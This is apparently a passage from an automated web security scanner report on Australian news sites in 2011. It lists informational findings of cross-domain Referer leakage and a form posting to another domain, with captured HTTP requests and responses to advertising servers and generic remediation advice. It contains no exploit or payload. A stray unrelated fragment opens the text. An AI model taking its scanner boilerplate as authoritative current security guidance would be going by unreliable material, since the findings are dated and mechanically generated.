
Amount
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy1
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2
ccy2

Request

GET /business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884 HTTP/1.1
Host: www.perthnow.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NetInsightSessionID=1; UnicaNIODID=Ynm1ibqbBqf-XJ0QXQN; sopsview=2; vcms=%7B%22volume%22%3A%2250%22%7D

Response

13.2. http://www.smh.com.au/business previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smh.com.au
Path:	/business

Issue detail

The page contains a form which POSTs data to the domain www.investsmart.com.au. The form contains the following fields:

FundName
FundLegalTypeID
MStarRating
SPRating
get_prices

Request

GET /business HTTP/1.1
Host: www.smh.com.au
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1315422900111; k_visit=1; __utma=251652569.1383434366.1315422949.1315422949.1315422949.1; __utmb=251652569.1.10.1315422949; __utmc=251652569; __utmz=251652569.1315422949.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

14. Cross-domain Referer leakage previous next
There are 88 instances of this issue:

http://ad-apac.doubleclick.net/adj/onl.smh.bus/bus/homepage
http://ad-apac.doubleclick.net/adj/onl.wa.news/news/homepage
http://ad.agkn.com/iframe!t=1131!
http://ad.au.doubleclick.net/adi/N5960.283587.YAHOONEWSAU/B5726304.3
http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16
http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16
http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews
http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews
http://ad.au.doubleclick.net/adj/ndm.news/news/weather
http://ad.au.doubleclick.net/adj/ndm.news/news/weather
http://ad.au.doubleclick.net/adj/ndm.ntn/news/home
http://ad.au.doubleclick.net/adj/ndm.ntn/news/home
http://ad.au.doubleclick.net/adj/ndm.ntn/news/local
http://ad.au.doubleclick.net/adj/ndm.ntn/news/local
http://ad.au.doubleclick.net/adj/ndm.tmrc/news/home
http://ad.au.doubleclick.net/adj/ndm.tmrc/news/local
http://ad.au.doubleclick.net/adj/ndm.tst/business/businessold/news
http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.2
http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.9
http://ad.doubleclick.net/adi/N6560.159469.AOD-INVITE/B5795406.3
http://ad.turn.com/server/ads.js
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/iframe3
http://au.pfinance.yahoo.com/compare/distribution/wan-widget/
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cms.ad.yieldmanager.net/v1/cms
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html
http://pixel.invitemedia.com/rubicon_sync
http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html
http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html
http://tools.themercury.com.au/feeds/feed-with-lead.php
http://tools.themercury.com.au/feeds/feed-with-lead.php
http://weather.news.com.au/widgets/local/
http://weather.news.com.au/widgets/monthly-almanac/
http://weather.news.com.au/widgets/radar/
http://weather.news.com.au/widgets/satellite/
http://web.adblade.com/imps.php
http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/
http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
http://www.facebook.com/connect/connect.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/recommendations.php
http://www.google.com/search
http://www.news.com.au/breaking-news
http://www.weatherchannel.com.au/weather-widget.aspx

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

14.1. http://ad-apac.doubleclick.net/adj/onl.smh.bus/bus/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/adj/onl.smh.bus/bus/homepage

Issue detail

The page was loaded from a URL containing a query string:

http://ad-apac.doubleclick.net/adj/onl.smh.bus/bus/homepage;cat1=homepage;cat=bus;ctype=index;pos=1;sz=250x45;tile=3;ord=85667321?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2884114/2620f_0811_CMC_Business_Index_Btn_250x45.gif

Request

GET /adj/onl.smh.bus/bus/homepage;cat1=homepage;cat=bus;ctype=index;pos=1;sz=250x45;tile=3;ord=85667321? HTTP/1.1
Host: ad-apac.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 422
Date: Wed, 07 Sep 2011 14:17:21 GMT

document.write('<a target="_blank" href="http://ad-apac.doubleclick.net/6k;h=v8/3b7b/0/0/%2a/y;245380687;0-0;2;52684723;5100-250/45;43791507/43809294/1;;~aopt=2/1/4/2;~sscs=%3fhttp://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=20&mc=click&pli=3124006&PluID=0&ord=6443171"><img src="http://s0.2mdn.net/viewad/2884114/2620f_0811_CMC_Business_Index_Btn_250x45.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.2. http://ad-apac.doubleclick.net/adj/onl.wa.news/news/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/adj/onl.wa.news/news/homepage

Issue detail

The page was loaded from a URL containing a query string:

http://ad-apac.doubleclick.net/adj/onl.wa.news/news/homepage;cat1=homepage;cat=news;ctype=index;pos=1;sz=620x225;tile=2;ord=68323266?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/onl.wa.news/news/homepage;cat1=homepage;cat=news;ctype=index;pos=1;sz=620x225;tile=2;ord=68323266? HTTP/1.1
Host: ad-apac.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 264
Date: Wed, 07 Sep 2011 14:14:26 GMT

document.write('<a target="_blank" href="http://ad-apac.doubleclick.net/6k;h=v8/3b7b/0/0/%2a/w;44306;0-0;0;52901159;28884-620/225;0/0/0;;~aopt=2/1/4/2;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.3. http://ad.agkn.com/iframe!t=1131! previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/iframe!t=1131!

Issue detail

The page was loaded from a URL containing a query string:

http://ad.agkn.com/iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=

The response contains the following links to other domains:

http://content.aggregateknowledge.com/ak/static/default/ak_static_728x90.jpg
http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1084636962?imid=4694733743820178491&ipid=805&crid=176&a=CLICK&status=0&l=http://www.aggregateknowledge.com

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:20 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 722
Date: Wed, 07 Sep 2011 14:15:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<body style="border: 0; margin: 0; padding: 0;">

<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1084636962?imid=4694733743820178491&ipid=805&crid=176&a=CLICK&status=0&l=http://www.aggregateknowledge.com" rel="nofollow external" target="_blank">
<img src="http://content.aggregateknowledge.com/ak/static/default/ak_static_728x90.jpg" alt="" border="0">
</a>
...[SNIP]...

14.4. http://ad.au.doubleclick.net/adi/N5960.283587.YAHOONEWSAU/B5726304.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adi/N5960.283587.YAHOONEWSAU/B5726304.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adi/N5960.283587.YAHOONEWSAU/B5726304.3;sz=300x600;dcopt=rcl;mtfIFrameRequest=false;click=http://global.ard.yahoo.com/SIG=15ski1qen/M=802378.14846397.14588805.13110087/D=au_news/S=2142299968:LREC/Y=AUNZ/EXP=1315412232/L=5SBlfXxsY4jpARpjTl.wjQBlMhd7ak5nfOgAChZm/B=dDleaXxsY0Q-/J=1315405032840970/K=pYU_NNV_aXF4M.XNbKo5ow/A=6455619/R=0/*;ord=0.651168153854087?

The response contains the following links to other domains:

http://global.ard.yahoo.com/SIG=15ski1qen/M=802378.14846397.14588805.13110087/D=au_news/S=2142299968:LREC/Y=AUNZ/EXP=1315412232/L=5SBlfXxsY4jpARpjTl.wjQBlMhd7ak5nfOgAChZm/B=dDleaXxsY0Q-/J=1315405032840970/K=pYU_NNV_aXF4M.XNbKo5ow/A=6455619/R=0/*http:/ad.au.doubleclick.net/activity;src%3D2717287%3Bmet%3D1%3Bv%3D1%3Bpid%3D67759175%3Baid%3D245012172%3Bko%3D0%3Bcid%3D43297905%3Brid%3D43315692%3Brv%3D1%3Bcs%3Dq%3Beid1%3D611137%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.au.doubleclick.net/6k%3Bh%3Dv8/3b7b/7/f5/%2a/y%3B245012172%3B0-0%3B0%3B67759175%3B4986-300/600%3B43297905/43315692/1%3B%3B%7Esscs%3D%3fhttp://www.shell.com.au/home/content/aus/products_services/on_the_road/fuels/shell_vpower/
http://s0.2mdn.net/2717287/PID_1690641_001109_VPower_300x600_BU.gif

Request

GET /adi/N5960.283587.YAHOONEWSAU/B5726304.3;sz=300x600;dcopt=rcl;mtfIFrameRequest=false;click=http://global.ard.yahoo.com/SIG=15ski1qen/M=802378.14846397.14588805.13110087/D=au_news/S=2142299968:LREC/Y=AUNZ/EXP=1315412232/L=5SBlfXxsY4jpARpjTl.wjQBlMhd7ak5nfOgAChZm/B=dDleaXxsY0Q-/J=1315405032840970/K=pYU_NNV_aXF4M.XNbKo5ow/A=6455619/R=0/*;ord=0.651168153854087? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38057
Date: Wed, 07 Sep 2011 14:17:17 GMT

<SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayM
...[SNIP]...
<NOSCRIPT>
<A TARGET="_blank" HREF="http://global.ard.yahoo.com/SIG=15ski1qen/M=802378.14846397.14588805.13110087/D=au_news/S=2142299968:LREC/Y=AUNZ/EXP=1315412232/L=5SBlfXxsY4jpARpjTl.wjQBlMhd7ak5nfOgAChZm/B=dDleaXxsY0Q-/J=1315405032840970/K=pYU_NNV_aXF4M.XNbKo5ow/A=6455619/R=0/*http://ad.au.doubleclick.net/activity;src%3D2717287%3Bmet%3D1%3Bv%3D1%3Bpid%3D67759175%3Baid%3D245012172%3Bko%3D0%3Bcid%3D43297905%3Brid%3D43315692%3Brv%3D1%3Bcs%3Dq%3Beid1%3D611137%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.au.doubleclick.net/6k%3Bh%3Dv8/3b7b/7/f5/%2a/y%3B245012172%3B0-0%3B0%3B67759175%3B4986-300/600%3B43297905/43315692/1%3B%3B%7Esscs%3D%3fhttp://www.shell.com.au/home/content/aus/products_services/on_the_road/fuels/shell_vpower/">
<IMG SRC="http://s0.2mdn.net/2717287/PID_1690641_001109_VPower_300x600_BU.gif" width="300" height="600" BORDER="0" alt="">
</A>
...[SNIP]...

14.5. http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adi/N799.Yahoo1/B4631682.16

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16;sz=728x90;dcopt=rcl;mtfIFrameRequest=false;click=http://ad.yieldmanager.com/clk?3,eAGljFFvgjAAhP8QUNqyoSN7KCANm7gxYQTfSluErMIy6qr.3jiMf2D3ct9dcgdxIDj0WwZbD7tNI5EfQIw8DwvOfWa5QRBgDJePyEdWxcqYvIhPmodqSz3yp4idX2cixFyhntP74uqraMLham7INuHwhv-0uKekvH2khOxnlJNZfsRpeD-n2WlDE7Whubuu8odNleqsSFQWwa5GKVoX3NsV4isr6tPuUKK3-5A8W1an9fcTAOzoDNJMzpl14-jw8QB0J42cNGDABoYB6CLo-gsETK8EZ3qyWcMGMQ52M-6P2m7HH3uQv71S4AIjnGqW,;ord=1315404893?

The response contains the following links to other domains:

http://ad.yieldmanager.com/clk?3,eAGljFFvgjAAhP8QUNqyoSN7KCANm7gxYQTfSluErMIy6qr.3jiMf2D3ct9dcgdxIDj0WwZbD7tNI5EfQIw8DwvOfWa5QRBgDJePyEdWxcqYvIhPmodqSz3yp4idX2cixFyhntP74uqraMLham7INuHwhv-0uKekvH2khOxnlJNZfsRpeD-n2WlDE7Whubuu8odNleqsSFQWwa5GKVoX3NsV4isr6tPuUKK3-5A8W1an9fcTAOzoDNJMzpl14-jw8QB0J42cNGDABoYB6CLo-gsETK8EZ3qyWcMGMQ52M-6P2m7HH3uQv71S4AIjnGqW,http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3b7b/f/162/%2a/l%3B232275021%3B5-0%3B0%3B56154821%3B3454-728/90%3B39197083/39214870/1%3B%3B%7Esscs%3D%3fhttp%3a%2f%2fwww.rsvp.com.au/%3Fs_cid%3Ddr%3Abt%3AYahoo%3Aman
http://s0.2mdn.net/2227036/RSVP_man_728x90.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N799.Yahoo1/B4631682.16;sz=728x90;dcopt=rcl;mtfIFrameRequest=false;click=http://ad.yieldmanager.com/clk?3,eAGljFFvgjAAhP8QUNqyoSN7KCANm7gxYQTfSluErMIy6qr.3jiMf2D3ct9dcgdxIDj0WwZbD7tNI5EfQIw8DwvOfWa5QRBgDJePyEdWxcqYvIhPmodqSz3yp4idX2cixFyhntP74uqraMLham7INuHwhv-0uKekvH2khOxnlJNZfsRpeD-n2WlDE7Whubuu8odNleqsSFQWwa5GKVoX3NsV4isr6tPuUKK3-5A8W1an9fcTAOzoDNJMzpl14-jw8QB0J42cNGDABoYB6CLo-gsETK8EZ3qyWcMGMQ52M-6P2m7HH3uQv71S4AIjnGqW,;ord=1315404893? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?WaUDAJdVGQBlSG4AAAAAACayKAAAAAAAAwAAAAYAAAAAAP8AAAAECs3BEAAAAAAASFc1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADiGAUAAAAAAAIAAgAAAAAAAAAAAAAAAAB-LAKFeBhzPwAAAAAAAAAAfiwChXgYgz8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3KSeJ3GCwChDKG1dFwfrlZYQld3J6roMfB2J5AAAAAA==,,http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fa%2F-%2Fwa%2F10210782%2Fwildcats-abandon-bogut-for-nevill%2F,B%3D10%26S%3D14494094%26Z%3D728x90%26_salt%3D1640159214%26cb%3D1315404889357362%26i%3D334050%26r%3D0%26ycg%3D%26ypos%3DN%26yprop%3Dau%255fnews%26yrc%3D%26yyob%3D,c14ae4d4-d95b-11e0-acb6-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6598
Date: Wed, 07 Sep 2011 14:14:54 GMT



<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://ad.yieldmanager.com/clk?3,eAGljFFvgjAAhP8QUNqyoSN7KCANm7gxYQTfSluErMIy6qr.3jiMf2D3ct9dcgdxIDj0WwZbD7tNI5EfQIw8DwvOfWa5QRBgDJePyEdWxcqYvIhPmodqSz3yp4idX2cixFyhntP74uqraMLham7INuHwhv-0uKekvH2khOxnlJNZfsRpeD-n2WlDE7Whubuu8odNleqsSFQWwa5GKVoX3NsV4isr6tPuUKK3-5A8W1an9fcTAOzoDNJMzpl14-jw8QB0J42cNGDABoYB6CLo-gsETK8EZ3qyWcMGMQ52M-6P2m7HH3uQv71S4AIjnGqW,http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3b7b/f/162/%2a/l%3B232275021%3B5-0%3B0%3B56154821%3B3454-728/90%3B39197083/39214870/1%3B%3B%7Esscs%3D%3fhttp%3a%2f%2fwww.rsvp.com.au/%3Fs_cid%3Ddr%3Abt%3AYahoo%3Aman"><img src="http://s0.2mdn.net/2227036/RSVP_man_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

14.6. http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adi/N799.Yahoo1/B4631682.16

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16;sz=728x90;dcopt=rcl;mtfIFrameRequest=false;click=http://ad.yieldmanager.com/clk?3,eAGljFFvgjAUhf8Qoe3aMlizhwtFwmZJUBiRt1qrNVNZUgzx329Tsj-w83DPd-.JPYQKu9eYxFYnhj8bkmhB6BNjDONozwMshKCE8phGPI6CTrcS3nYfRZ2e1gWDuzJ9e3.Q71QAm3lrAWrIM0.TfL6sF4bM-E-TxwJ--u8qAQ4PSuoeVrJM5wBA5kzJklXFyi27mledGlWzOKkM86qozsvGsL7Zfaqud0q2dDP9fb4GgRvHrxeE9DW82MmHN-2GITTDGY3OTtaPaHv1x4v1Hn0D6R5cvA==,;ord=1315405039?

The response contains the following links to other domains:

http://ad.yieldmanager.com/clk?3,eAGljFFvgjAUhf8Qoe3aMlizhwtFwmZJUBiRt1qrNVNZUgzx329Tsj-w83DPd-.JPYQKu9eYxFYnhj8bkmhB6BNjDONozwMshKCE8phGPI6CTrcS3nYfRZ2e1gWDuzJ9e3.Q71QAm3lrAWrIM0.TfL6sF4bM-E-TxwJ--u8qAQ4PSuoeVrJM5wBA5kzJklXFyi27mledGlWzOKkM86qozsvGsL7Zfaqud0q2dDP9fb4GgRvHrxeE9DW82MmHN-2GITTDGY3OTtaPaHv1x4v1Hn0D6R5cvA==,http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3b7b/f/142/%2a/q%3B232275021%3B13-0%3B0%3B56154821%3B3454-728/90%3B40944383/40962170/1%3B%3B%7Esscs%3D%3fhttp%3a%2f%2fwww.rsvp.com.au/foyer/index5.jsp%3Fs_cid%3Ddr%3Abt%3AYahoo%3Ahelping
http://s0.2mdn.net/2227036/rsvp_feb11_728x90.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N799.Yahoo1/B4631682.16;sz=728x90;dcopt=rcl;mtfIFrameRequest=false;click=http://ad.yieldmanager.com/clk?3,eAGljFFvgjAUhf8Qoe3aMlizhwtFwmZJUBiRt1qrNVNZUgzx329Tsj-w83DPd-.JPYQKu9eYxFYnhj8bkmhB6BNjDONozwMshKCE8phGPI6CTrcS3nYfRZ2e1gWDuzJ9e3.Q71QAm3lrAWrIM0.TfL6sF4bM-E-TxwJ--u8qAQ4PSuoeVrJM5wBA5kzJklXFyi27mledGlWzOKkM86qozsvGsL7Zfaqud0q2dDP9fb4GgRvHrxeE9DW82MmHN-2GITTDGY3OTtaPaHv1x4v1Hn0D6R5cvA==,;ord=1315405039? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?WaUDAJdVGQBlSG4AAAAAACayKAAAAAAAAAAMAAYAAAAAAAUAAQAECs3BEAAAAAAASFc1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADiGAUAAAAAAAIAAgAAAAAAAAAAAAAAAABtXqeJuSmkPwAAAAAAAAAAbV6nibkptD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCQb-bbmGwCuXSwRufzF0MVUhVAC7kjg07o5GYAAAAAA==,,http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fbusiness%2F,B%3D10%26S%3D14494094%26Z%3D728x90%26_salt%3D1060371077%26cb%3D1315405032840970%26i%3D334050%26r%3D0%26ycg%3D%26ypos%3DN%26yprop%3Dau%255fnews%26yrc%3D%26yyob%3D,180284da-d95c-11e0-94cf-78e7d1fa057c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6565
Date: Wed, 07 Sep 2011 14:17:57 GMT



<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
